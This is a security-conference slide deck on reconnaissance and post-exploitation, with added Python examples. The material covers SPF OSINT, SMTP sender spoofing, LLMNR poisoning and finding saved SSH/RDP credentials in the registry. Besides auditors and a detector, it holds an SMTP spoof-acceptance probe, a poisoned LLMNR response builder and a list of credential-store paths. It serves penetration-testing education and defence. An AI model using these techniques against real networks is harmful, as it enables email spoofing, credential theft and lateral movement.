Copyright © FireEye, Inc. All rights reserved.
Brandon Arvanaghi
@arvanaghi
Breadcrumbs to Loaves: How Tidbits of Information Lead Us to Full-Scale Compromise
Brandon Arvanaghi (@arvanaghi)
• Security Consultant at Mandiant
• Webshell detection, post-exploitation, sandbox detection tools
• Researched automated attack plan generation at Vanderbilt University
Breadcrumbs
• Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation
• Types of breadcrumbs:
• Open Source Intelligence Gathering (OSINT)/External
• Wireless
• Internal (physical connection)
• Post-exploitation – Bulk of Talk
• SessionGopher – tool I developed to discover Unix systems and jump boxes
https://github.com/fireeye/SessionGopher
OSINT/EXTERNAL BREADCRUMBS
Crumb #1: SPF Records
• Sender Policy Framework
• You own example.com
• Problem: Spoofing emails from @example.com is easily done by creating a mail server and modifying headers
• Solution: SPF record in example.com’s DNS zone. Says “you should only see emails from @example.com from the following IP addresses: ….”
• Recipients now automatically check with example.com’s DNS servers if email’s source IP is in SPF record
Crumb #1: SPF Records
• As an attacker, SPF records provide insight into third parties
• Sometimes, companies want third parties to be able to send mail on their behalf
• E.g. example of LinkedIn trusting DocuSign to send emails from
https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records
• https://hackertarget.com/quietly-mapping-the-network-attack-surface/
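The OSINT value of an SPF record is that it enumerates exactly who a domain has authorised to send as it. The following added example (not from the talk and not part of SessionGopher) parses an SPF TXT record the way a defender auditing their own zone would: it lists the delegated third parties (include:, a:, mx:, exists:, ip4:/ip6: and redirect=) and flags a permissive all-qualifier or too many DNS-lookup terms. The record string is constructed for the example and no DNS query is made.

```python
import ipaddress
import re

# Constructed SPF record for the example (not a real zone's record).
SAMPLE_SPF = ("v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 "
              "include:_spf.mailer.example.net include:spf.crm.example.org "
              "a mx:mail.example.com ~all")

# qualifier, mechanism name, optional ':domain-or-address', optional '/cidr'
MECHANISM_RE = re.compile(
    r"^([+\-~?])?(all|include|a|mx|ptr|ip4|ip6|exists)(?::([^/]*))?(?:/(.*))?$",
    re.IGNORECASE)
LOOKUP_MECHANISMS = {"include", "a", "mx", "ptr", "exists"}  # each costs a DNS query


def parse_spf(record):
    """Split an SPF record into (qualifier, mechanism, argument, cidr) tuples and modifiers."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF v1 record")
    mechanisms, modifiers, all_qualifier = [], {}, None
    for term in terms[1:]:
        name, eq, value = term.partition("=")
        if eq and ":" not in name:                  # modifier: redirect=..., exp=...
            modifiers[name.lower()] = value
            continue
        m = MECHANISM_RE.match(term)
        if not m:
            raise ValueError(f"unrecognised SPF term: {term}")
        qualifier, mech = m.group(1) or "+", m.group(2).lower()
        if mech == "all":
            all_qualifier = qualifier
        mechanisms.append((qualifier, mech, m.group(3), m.group(4)))
    return {"mechanisms": mechanisms, "modifiers": modifiers, "all": all_qualifier}


def third_parties(parsed):
    """Everything the record delegates to: the OSINT view of who may send as the zone."""
    found = {"includes": [], "domains": [], "networks": []}
    for _, mech, arg, cidr in parsed["mechanisms"]:
        if mech == "include" and arg:
            found["includes"].append(arg)
        elif mech in ("a", "mx", "exists") and arg:
            found["domains"].append(arg)
        elif mech in ("ip4", "ip6") and arg:
            net = ipaddress.ip_network(arg + (f"/{cidr}" if cidr else ""), strict=False)
            found["networks"].append(str(net))
    if "redirect" in parsed["modifiers"]:
        found["includes"].append(parsed["modifiers"]["redirect"])
    return found


def audit_spf(record):
    """Defender-side checks: permissive policy, deprecated ptr, RFC 7208 lookup limit."""
    parsed = parse_spf(record)
    findings = []
    if parsed["all"] in ("+", "?"):
        findings.append(f"'{parsed['all']}all' lets anyone send as the zone")
    elif parsed["all"] is None and "redirect" not in parsed["modifiers"]:
        findings.append("no 'all' term: unlisted senders get a neutral result")
    if any(m == "ptr" for _, m, _, _ in parsed["mechanisms"]):
        findings.append("ptr mechanism is deprecated (RFC 7208 section 5.5)")
    # Only top-level terms are counted; nested includes would add to the total.
    lookups = sum(1 for _, m, _, _ in parsed["mechanisms"] if m in LOOKUP_MECHANISMS)
    lookups += "redirect" in parsed["modifiers"]
    if lookups > 10:
        findings.append(f"{lookups} DNS-lookup terms exceed the RFC 7208 limit of 10")
    return {"third_parties": third_parties(parsed), "lookups": lookups, "findings": findings}


if __name__ == "__main__":
    report = audit_spf(SAMPLE_SPF)
    print("delegated senders:", report["third_parties"])
    print("findings:", report["findings"] or "none")
```

Running it on the constructed record lists two include domains, one mx domain and two networks, with no findings; swapping `~all` for `+all` produces the permissive-policy finding. Every include listed is a third party whose own SPF policy, and security posture, now stands in for yours.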
Crumb #2: Subsidiaries
• Company only as strong as its weakest link
• Mergers and Acquisitions
• Due diligence
• Cyber insurance
Crumb #3: Unauthenticated SMTP Server
• If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees
• Without authentication, you can spoof any internal email address!
http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
INTERNAL BREADCRUMBS
Crumb #1: LLMNR
• LLMNR = Link-Local Multicast Name Resolution
• Hosts on the same link (subnet) answer name-resolution queries for each other, instead of relying only on the DNS server
• Peer-to-peer, decentralized
• Fast
• Multicast
• Implicitly trust everyone
• Responder by SpiderLabs
Unicast example (diagram): the PC sends a standard DNS query to the DNS server, which answers with 10.0.30.15; the PC connects to 10.0.30.15.
Multicast example (diagram): the PC asks everyone on the link “Where’s confluence.corp.com?”; whichever host answers “That’s me! 10.1.40.15, come over!” is trusted, and the PC connects to 10.1.40.15.
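The multicast diagram is the whole problem: any host on the link may answer, and the client trusts the first answer. A legitimate host only ever answers for its own name, so a source that answers for many different queried names is behaving like a poisoner. The following added example (not from the talk and not part of Responder or SessionGopher) implements that detection over a constructed capture of UDP/5355 payloads: it parses LLMNR responses, which share the DNS wire format, and reports any source answering for three or more distinct names. The packet builder exists only to construct the sample data; nothing is sent on the network, and the toy parser handles uncompressed names only.

```python
import struct
from collections import defaultdict

LLMNR_PORT = 5355            # UDP port LLMNR uses (RFC 4795)
LLMNR_GROUP = "224.0.0.252"  # IPv4 multicast group queries are sent to


def encode_name(name):
    """DNS label encoding: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf, offset):
    """Decode an uncompressed DNS name at offset; returns (name, next_offset)."""
    labels = []
    while True:
        length = buf[offset]
        offset += 1
        if length == 0:
            break
        if length >= 0xC0:
            raise ValueError("compressed names not supported by this toy parser")
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_llmnr_response(txid, name, ip, ttl=30):
    """Construct an LLMNR A-record response (DNS wire format). Sample data only."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1: response
    qname = encode_name(name)
    question = qname + struct.pack("!HH", 1, 1)                 # QTYPE A, QCLASS IN
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = qname + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_llmnr_response(pkt):
    """Return {'txid', 'name', 'ip'} for an A-record response, or None otherwise."""
    if len(pkt) < 12:
        return None
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not (flags & 0x8000) or qdcount != 1 or ancount < 1:
        return None
    name, off = decode_name(pkt, 12)
    off += 4                                                    # skip QTYPE/QCLASS
    _, off = decode_name(pkt, off)                              # answer owner name
    rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    rdata = pkt[off:off + rdlen]
    ip = ".".join(str(b) for b in rdata) if rtype == 1 and rdlen == 4 else None
    return {"txid": txid, "name": name, "ip": ip}


def find_promiscuous_responders(packets, threshold=3):
    """packets: iterable of (src_ip, raw_udp_payload) captured on UDP/5355.
    Returns {src_ip: sorted names} for sources answering `threshold`+ distinct names."""
    names_by_src = defaultdict(set)
    for src, raw in packets:
        parsed = parse_llmnr_response(raw)
        if parsed and parsed["ip"]:
            names_by_src[src].add(parsed["name"].lower())
    return {src: sorted(names) for src, names in names_by_src.items()
            if len(names) >= threshold}


# Constructed capture: one host answering for itself, one answering for everything.
SAMPLE_CAPTURE = [
    ("10.1.40.15", build_llmnr_response(0x1001, "confluence.corp.com", "10.1.40.15")),
    ("10.1.40.99", build_llmnr_response(0x1002, "confluence.corp.com", "10.1.40.99")),
    ("10.1.40.99", build_llmnr_response(0x1003, "fileshare", "10.1.40.99")),
    ("10.1.40.99", build_llmnr_response(0x1004, "prnt-svr01", "10.1.40.99")),
    ("10.1.40.99", build_llmnr_response(0x1005, "wiki-old", "10.1.40.99")),
]

if __name__ == "__main__":
    for src, names in find_promiscuous_responders(SAMPLE_CAPTURE).items():
        print(f"suspicious LLMNR responder {src}: answered for {', '.join(names)}")
```

On the constructed capture only 10.1.40.99 is reported. A lower threshold turns the check into an inventory of every host that answers LLMNR at all, which is a useful first step before disabling the protocol through policy so that nobody is left answering.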
Crumb #2: IT HelpDesk/Intranet
• Company helpdesk sites often lack authentication
• Real examples from engagements:
• “Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3”
• Excel file storing Unix system passwords
Crumb #2: IT HelpDesk/Intranet
1. Nmap scan across subnets
2. Run EyeWitness by Christopher Truncer
Crumb #3: Anonymous Shares
• Publicly available shared folders that do not require any form of authentication
• Often out of perceived necessity
• Contractors, vendors
• Result: plaintext password files
Crumb #4: When Hostnames Make Sense
• Use PowerView or ADExplorer to get lists of hostnames
• Nonintrusive way to understand the role of each system without doing Nmap scans
• SQLWIN7.CORP.COM
• MAIL01.CORP.COM
• MEDIA-BKUP.CORP.COM
WIRELESS BREADCRUMBS
Crumb #1: Guest Network Host Visibility
• Guest networks should be segregated. This is not always done properly.
• Visible hosts with visible services can lead to lateral movement onto corporate network
• Pivot!
Crumb #2: Remembered Networks
• Your device probes for every single access point it remembers having associated with
• Yells out known SSID names indiscriminately
• A WiFi Pineapple responds to any probe, automatically connecting you
• Directs your traffic to the internet while reading all unencrypted traffic
• Quietly changes HTTPS requests to HTTP
Remembered Networks: Real Mandiant Engagement (diagram, slides 28 to 31)
• Device associated with the remembered network
• Visible to two different networks
• PsExec, WMIExec, etc.
POST-EXPLOITATION
SessionGopher: Finding Unix Systems and Jump Boxes
https://github.com/fireeye/SessionGopher
The Registry
• On many engagements, consultants are tasked with exploiting Unix systems
• Intellectual property on MacBook Pros
• Point of sale terminals running Linux
• Etc.
• Often not domain-joined!
• Would be so much easier if they were
• Use PowerView
• How can we find & exploit them?
The Registry
• Current methodology
1. Nmap for live hosts not found in Active Directory
a. Open Unix ports
2. netstat domain-joined systems, look for active connections over Unix ports
3. Search Active Directory for groups like “Linux Admins” & “Mac Admins”
a. Find their members’ workstations, active sessions
• Methodology relies on luck and active sessions. Better way?
The Registry
• HKEY_USERS
• Persistent storage of saved session for any user who has logged in!
• Users don’t have to be currently logged in
• Though Unix systems are not domain-joined, they are often managed by domain-joined Windows systems
• Valuable artifacts on these hosts
• Solves our “active session” problem
• But what can we find in this magical hive that helps us exploit Unix systems?
The Registry (screenshot slide)
Solution
1. Find artifacts left by tools typically used to access Unix systems.
2. If they exist, then saved sessions might exist. Extract ’em.
Tools
• WinSCP
• FileZilla
• PuTTY
• SuperPuTTY
• VNC
• RDP
• More!
Paths to Sessions
Stored in Registry
• PuTTY
• HKEY_USERS\<SID>\SOFTWARE\SimonTatham\PuTTY\Sessions
• WinSCP
• HKEY_USERS\<SID>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
• Microsoft Remote Desktop
• HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Non-registry (assumes filename/location unchanged)
• FileZilla
• <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml
• SuperPuTTY
• <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
WinSCP
HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions\<SessionName>
HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Configuration\Security
Paths to Sessions
• HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default
FileZilla
<Drive>:\Users\<Username>\AppData\Roaming\FileZilla\SiteManager.xml
SuperPuTTY
<Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
• ExtraArgs field can contain plaintext password
PuTTY .ppk Files
• One-click PuTTY logins
• Key can be plaintext (as in the slide’s screenshot) or encrypted
Microsoft .rdp Files
• Launches the connection on double-click, but the file itself is plain text: drag it into a text editor to read it
• Plethora of arguments, many optional
• Host, admin session, prompt for credentials, etc.
• Fieldname:TypeOfField:Value
• TypeOfField = Integer or String
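The line format above is simple enough to parse directly. The following added example (not from the talk and not part of SessionGopher) parses a constructed .rdp file into typed fields and then audits it for the settings a defender cares about: a saved password, a disabled credential prompt, an administrative session, and drive or clipboard redirection. Besides the i (integer) and s (string) types on the slide, real files also use a b type for hex-encoded binary, which is how the DPAPI-protected `password 51` value is stored; the parser keeps that blob opaque.

```python
# Constructed .rdp file (not from any engagement). Values are placeholders.
SAMPLE_RDP = """screen mode id:i:2
full address:s:10.2.30.20:3389
username:s:CORP\\svc_backup
administrative session:i:1
prompt for credentials:i:0
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB(placeholder)
redirectclipboard:i:1
drivestoredirect:s:*
"""


def parse_rdp(text):
    """Parse name:type:value lines into a dict. Types: i (int), s (str), b (hex blob)."""
    fields = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":", 2)          # the value may itself contain ':' (host:port)
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected name:type:value, got {line!r}")
        name, ftype, value = parts
        if ftype == "i":
            fields[name] = int(value)
        elif ftype == "s":
            fields[name] = value
        elif ftype == "b":
            fields[name] = value            # hex-encoded binary (DPAPI blob); kept opaque
        else:
            raise ValueError(f"line {lineno}: unknown field type {ftype!r}")
    return fields


def audit_rdp(fields):
    """Settings that turn a saved .rdp file into a ready-made lateral-movement hop."""
    findings = []
    if "password 51" in fields:
        findings.append("saved password present ('password 51' DPAPI blob)")
    if fields.get("prompt for credentials") == 0 and "username" in fields:
        findings.append(f"credential prompt disabled for {fields['username']}")
    if fields.get("administrative session") == 1:
        findings.append("targets the administrative (console) session")
    if fields.get("drivestoredirect"):
        findings.append(f"local drives redirected into the session: {fields['drivestoredirect']}")
    if fields.get("redirectclipboard") == 1:
        findings.append("clipboard redirection enabled")
    return findings


def audit_rdp_file(text):
    fields = parse_rdp(text)
    return {"target": fields.get("full address"),
            "username": fields.get("username"),
            "findings": audit_rdp(fields)}


if __name__ == "__main__":
    report = audit_rdp_file(SAMPLE_RDP)
    print(f"{report['username']} -> {report['target']}")
    for finding in report["findings"]:
        print("  -", finding)
```

The `password 51` blob is protected with DPAPI under the profile of the user who saved it, which is exactly why the talk's registry-and-profile approach works: whoever can read that user's profile on that host can use the file as-is. The audit therefore flags presence rather than attempting to decrypt anything.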
Windows Management Instrumentation (WMI)
• Rather than running SessionGopher on each computer (impractical), we can use WMI
• Built-in “Invoke-WmiMethod” command in PowerShell
• Remote registry querying ability
Write to CSV (Invoke-SessionGopher -o)
• Create a physical mapping of the network
• Aggregate all session data across entire domain or targeted computers
• Essentially, see the physical infrastructure of network!
QUESTIONS?
Twitter: @arvanaghi
Github: https://github.com/fireeye/SessionGopher
Brandon Arvanaghi

A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 

Breadcrumbs to Loaves: BSides Austin '17

  • 1. Copyright © FireEye, Inc. All rights reserved. Brandon Arvanaghi (@arvanaghi). Breadcrumbs to Loaves: How Tidbits of Information Lead Us to Full-Scale Compromise
  • 2. Brandon Arvanaghi (@arvanaghi) • Security Consultant at Mandiant • Webshell detection, post-exploitation, sandbox detection tools • Researched automated attack plan generation at Vanderbilt University
  • 3. Breadcrumbs • Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation • Types of breadcrumbs: • Open Source Intelligence Gathering (OSINT)/External • Wireless • Internal (physical connection) • Post-exploitation (bulk of the talk) • SessionGopher: a tool I developed to discover Unix systems and jump boxes https://github.com/fireeye/SessionGopher
  • 4. OSINT/EXTERNAL BREADCRUMBS
  • 5. Crumb #1: SPF Records • Sender Policy Framework • You own example.com • Problem: spoofing email from @example.com is easy; stand up a mail server and put whatever sender you like in the headers • Solution: an SPF record (a TXT record) in example.com's DNS zone that says "mail from @example.com should only come from the following IP addresses: ..." • Receiving mail servers now automatically look up example.com's SPF record and check whether the connecting server's IP is listed (SPF checks the envelope sender given in MAIL FROM, not the From: header the user sees)
  • 6. Crumb #1: SPF Records • As an attacker, SPF records give insight into third parties • Sometimes companies want third parties to be able to send mail on their behalf • E.g. LinkedIn trusting DocuSign to send email on its behalf • https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records • https://hackertarget.com/quietly-mapping-the-network-attack-surface/
  • 7. Crumb #2: Subsidiaries • A company is only as strong as its weakest link • Mergers and acquisitions • Due diligence • Cyber insurance
  • 8–10. (Image slides: SEC Form 10-K, Exhibit 21, the filing that discloses a company's subsidiaries; see Editor's Notes 4–6)
  • 11. Crumb #3: Unauthenticated SMTP Server • If port 25 (SMTP) is open on a remote host and the server accepts mail without authentication, you may be able to send mail through it to internal employees • Without authentication nothing ties MAIL FROM to who you are: you can spoof any internal email address! (If that server is listed in the company's SPF record, the spoofed mail even passes SPF, because it really does come from the company's mail server) • http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
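The HELO / MAIL FROM / RCPT TO exchange the slide relies on, as an added Python example (not from the talk or from SessionGopher): a small probe that walks the handshake with no AUTH, records both sides of the conversation, and reports whether the server would accept a spoofed internal sender for a given recipient. It sends RSET and QUIT instead of DATA, so no message is ever delivered. The mail server here is a constructed in-memory stand-in (FakeInternalRelay) whose replies are assumed; against a real host you would pass the result of socket.create_connection((host, 25)) instead.

```python
import re

_REPLY_LINE = re.compile(rb"^(\d{3})([ -])(.*)$")


class SmtpProbe:
    """Tiny SMTP client that keeps a transcript of both sides.

    `sock` needs only sendall() and recv(), so a real socket from
    socket.create_connection((host, 25)) and the in-memory fake below both work.
    """

    def __init__(self, sock):
        self.sock = sock
        self.buf = b""
        self.transcript = []          # ("S", server line) / ("C", client line)

    def _readline(self):
        while b"\r\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, self.buf = self.buf.split(b"\r\n", 1)
        return line

    def reply(self):
        """Read one reply, multi-line ("250-...") included; return (code, lines)."""
        texts = []
        while True:
            line = self._readline()
            self.transcript.append(("S", line.decode("ascii", "replace")))
            m = _REPLY_LINE.match(line)
            if not m:
                raise ValueError("malformed SMTP reply: %r" % line)
            texts.append(m.group(3).decode("ascii", "replace"))
            if m.group(2) == b" ":                    # "250 " ends it, "250-" continues
                return int(m.group(1)), texts

    def cmd(self, line):
        self.transcript.append(("C", line))
        self.sock.sendall(line.encode("ascii") + b"\r\n")
        return self.reply()


def probe_unauthenticated_spoof(sock, helo_name, mail_from, rcpt_to):
    """HELO / MAIL FROM / RCPT TO with no AUTH, then RSET and QUIT instead of
    DATA, so nothing is delivered. Returns (accepted, transcript): accepted is
    True when the server took both the spoofed sender and the recipient."""
    p = SmtpProbe(sock)
    accepted = False
    code, _ = p.reply()                               # 220 banner
    if code == 220 and p.cmd("HELO " + helo_name)[0] == 250:
        if p.cmd("MAIL FROM:<%s>" % mail_from)[0] == 250:
            code, _ = p.cmd("RCPT TO:<%s>" % rcpt_to)
            accepted = code in (250, 251)             # 251: "user not local; will forward"
        p.cmd("RSET")
    try:
        p.cmd("QUIT")
    except ConnectionError:
        pass
    return accepted, p.transcript


class FakeInternalRelay:
    """Constructed stand-in (test fixture, not a real server) for a corporate
    MTA that accepts any MAIL FROM without AUTH but only relays to its own
    domain: exactly the "spoof any internal address" case on the slide."""

    def __init__(self, domain="corp.com"):
        self.domain = domain.lower()
        self.pending = b"220 mail01.corp.com ESMTP ready\r\n"

    def sendall(self, data):
        verb, _, arg = data.decode("ascii").strip().partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            reply = "250 mail01.corp.com Hello"
        elif verb == "MAIL":
            reply = "250 2.1.0 Sender OK"
        elif verb == "RCPT":
            addr = arg.partition(":")[2].strip("<>").lower()
            reply = ("250 2.1.5 Recipient OK" if addr.endswith("@" + self.domain)
                     else "554 5.7.1 Relay access denied")
        elif verb == "RSET":
            reply = "250 2.0.0 Reset state"
        elif verb == "QUIT":
            reply = "221 2.0.0 Bye"
        else:
            reply = "500 5.5.1 Command unrecognized"
        self.pending += (reply + "\r\n").encode("ascii")

    def recv(self, n):
        data, self.pending = self.pending[:n], self.pending[n:]
        return data
```

A server that answers 250 to the RCPT TO here will also accept DATA, so the transcript is the evidence to put in the report; stopping at RSET keeps the test side-effect free. The same probe against an external recipient tells you whether the host is an open relay to the world (a separate, worse finding) or only accepts mail for its own domain.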
  • 12. INTERNAL BREADCRUMBS
  • 13. Crumb #1: LLMNR • LLMNR = Link-Local Multicast Name Resolution • Hosts on the same link (subnet) answer name queries for each other when the DNS server cannot, instead of relying only on DNS • Peer-to-peer, decentralized • Fast • Multicast (UDP 5355 to 224.0.0.252, or ff02::1:3 for IPv6) • Implicitly trusts everyone: whoever answers first wins, with no authentication • Responder by SpiderLabs answers every query with the attacker's IP and collects the credentials the victim then presents • Fix: disable it via Group Policy ("Turn off multicast name resolution" under DNS Client) or set EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient
  • 14–16. Unicast example: the PC sends a standard DNS query to the DNS server; the server answers 10.0.30.15; the PC says "Great! I'm coming to 10.0.30.15" and connects to the right host.
  • 17–18. Multicast example (LLMNR): the PC asks everyone on the link "Hi everyone! Where's confluence.corp.com?"; anyone on the link can answer "That's me! 10.1.40.15, come over!"; the PC says "Great! I'm coming to 10.1.40.15" and connects to whoever answered.
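The multicast exchange above on the wire, as an added Python example (not from the talk; Responder itself is the SpiderLabs tool named on the slide). LLMNR reuses the DNS message layout from RFC 4795: a 12-byte header, one question, and in a response the answer records. The code builds the PC's query for confluence.corp.com, builds the kind of poisoned answer a responder on the link sends back, parses both, and shows the only check a client performs before trusting an answer: matching transaction ID and question. The hostname and addresses are constructed.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 multicast group (ff02::1:3 for IPv6)
LLMNR_PORT = 5355
QR_FLAG = 0x8000              # bit 15 of the flags word: 0 = query, 1 = response
TYPE_A, CLASS_IN = 1, 1


def _encode_name(name):
    """Encode a hostname as DNS-style length-prefixed labels (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def _decode_name(buf, off):
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointers are not used in LLMNR")
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(name, txid=0x1234, qtype=TYPE_A):
    """What the PC multicasts: header with all flags zero, plus one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def build_poisoned_response(query, answer_ip, ttl=30):
    """What a responder on the link sends back: same ID, same question, QR=1,
    one A record pointing at the attacker. Nothing in the protocol lets the
    PC tell this from a legitimate answer."""
    q = parse(query)
    if q["qtype"] != TYPE_A:
        raise ValueError("this example only answers A queries")
    header = struct.pack("!HHHHHH", q["id"], QR_FLAG, 1, 1, 0, 0)
    question = _encode_name(q["qname"]) + struct.pack("!HH", q["qtype"], q["qclass"])
    rdata = socket.inet_aton(answer_ip)
    answer = _encode_name(q["qname"]) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse(packet):
    """Decode a query or response carrying exactly one question (the LLMNR norm)."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", packet[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    off = 12
    qname, off = _decode_name(packet, off)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    off += 4
    answers = []
    for _ in range(ancount):
        name, off = _decode_name(packet, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        rdata = packet[off:off + rdlen]
        off += rdlen
        addr = socket.inet_ntoa(rdata) if rtype == TYPE_A and rdlen == 4 else rdata.hex()
        answers.append({"name": name, "type": rtype, "ttl": ttl, "address": addr})
    return {"id": txid, "is_response": bool(flags & QR_FLAG), "qname": qname,
            "qtype": qtype, "qclass": qclass, "answers": answers}


def response_matches(query, response):
    """All the checking a client does before trusting an answer: transaction
    ID and question must match. There is no authentication of the responder."""
    q, r = parse(query), parse(response)
    return (r["is_response"] and q["id"] == r["id"]
            and q["qname"].lower() == r["qname"].lower() and q["qtype"] == r["qtype"])
```

For detection, the same parser run over a capture of UDP 5355 makes the attack obvious: one source address answering queries for many unrelated names within seconds, or answering names that the real DNS zone does not contain.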
  • 20. Crumb #2: IT HelpDesk/Intranet • Company helpdesk sites often lack authentication • Real examples from engagements: • "Our point-of-sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3" • An Excel file storing Unix system passwords
  • 21. Crumb #2: IT HelpDesk/Intranet 1. Nmap scan across subnets 2. Run EyeWitness by Christopher Truncer against the web ports Nmap found (see Editor's Note 9)
  • 22. Crumb #3: Anonymous Shares • Publicly accessible shared folders that do not require any form of authentication • Often created out of perceived necessity • Contractors, vendors • Result: plaintext password files
  • 23. Crumb #4: When Hostnames Make Sense • Use PowerView or ADExplorer to get lists of hostnames from Active Directory • Non-intrusive way to understand the role of each system without Nmap scans • SQLWIN7.CORP.COM • MAIL01.CORP.COM • MEDIA-BKUP.CORP.COM
  • 24. WIRELESS BREADCRUMBS
  • 25. Crumb #1: Guest Network Host Visibility • Guest networks should be segregated from the corporate network. This is not always done properly. • Visible hosts with reachable services can lead to lateral movement onto the corporate network • Pivot!
  • 26. Crumb #2: Remembered Networks • Your device probes for every access point it remembers having associated with • Broadcasts known SSID names indiscriminately • A WiFi Pineapple responds to any probe, so the device auto-connects to the attacker's access point • The attacker forwards your traffic to the internet while reading everything unencrypted • Quietly rewrites HTTPS links to HTTP (SSL stripping)
  • 27–30. Remembered Networks: Real Mandiant Engagement (image slides; see Editor's Notes 10–13). A wired-in host still probing for a remembered SSID associated with the spoofed access point ("associated!") and was then visible to two different networks: PsExec, WMIExec, etc.
  • 31. (Image slide: macOS System Preferences > Network > Advanced, the preferred-networks list; see Editor's Note 14)
  • 32. POST-EXPLOITATION. SessionGopher: Finding Unix Systems and Jump Boxes https://github.com/fireeye/SessionGopher
  • 33. The Registry • On many engagements, consultants are tasked with exploiting Unix systems • Intellectual property on MacBook Pros • Point-of-sale terminals running Linux • Etc. • Often not domain-joined! • Would be so much easier if they were: use PowerView • How can we find & exploit them?
  • 34. The Registry • Current methodology: 1. Nmap for live hosts not found in Active Directory a. Open Unix ports (e.g. 22/SSH) 2. Run netstat on domain-joined systems and look for active connections over Unix ports 3. Search Active Directory for groups like "Linux Admins" & "Mac Admins" a. Find their members' workstations and active sessions • This methodology relies on luck and on active sessions. Better way?
  • 35. The Registry • HKEY_USERS • Persistent storage of saved sessions for every user whose profile hive is loaded on the box! • Users don't have to be currently logged in interactively, but their hive must be loaded: a logged-off user's hive lives on disk as C:\Users\<user>\NTUSER.DAT and can be loaded with reg load or parsed offline • Though Unix systems are not domain-joined, they are often managed from domain-joined Windows systems • Valuable artifacts on those hosts • Solves our "active session" problem • But what can we find in this magical hive that helps us exploit Unix systems?
  • 36. The Registry (image slide: HKEY_USERS subkeys named by SID; see Editor's Note 16)
  • 37. Solution 1. Find artifacts left by tools typically used to access Unix systems. 2. If they exist, saved sessions might exist. Extract 'em.
  • 38. Tools • WinSCP • FileZilla • PuTTY • SuperPuTTY • VNC • RDP • More!
